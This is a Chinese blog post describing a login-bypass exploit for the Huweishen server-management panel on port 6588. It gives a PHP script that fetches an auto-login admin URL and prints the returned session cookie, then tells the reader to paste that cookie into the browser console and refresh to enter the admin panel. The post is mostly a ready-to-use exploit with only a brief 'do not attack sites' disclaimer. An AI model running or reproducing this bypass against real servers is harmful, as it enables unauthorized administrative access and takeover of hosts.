今日博主一篇文章都没更新 | 共分享了个网络安全资讯

护卫神6588端口绕过登录漏洞

  • 内容
  • 相关

前言

1.请勿恶意攻击任何站点

2.有上传文件权限

步骤

根目录新建cookie.php文件引入代码

<?php
function httpGet() {
    $url = '域名+:6588/admin/index.asp?f=autologin';//请填写域名+:6588/admin/index.asp?f=autologin
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response header
    curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 120);
    $result = curl_exec($ch);
    return $result;
}
echo httpGet();
?>

利用浏览器F12审查元素中的Console功能引入代码


document.cookie=cookie.php中获取的cookie值
刷新即可进入




本文标签:

收录状态:百度√[百度已收录]丨360×[360未收录]丨搜狗√[搜狗已收录]

版权声明:若无特殊注明,本文皆为《Mrcat》原创,转载请保留文章出处。

本文链接:护卫神6588端口绕过登录漏洞 - https://mracat.com/237.html

用手机扫描访问本文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注

请勿乱用他人邮箱,否者您将收不到最新动态消息~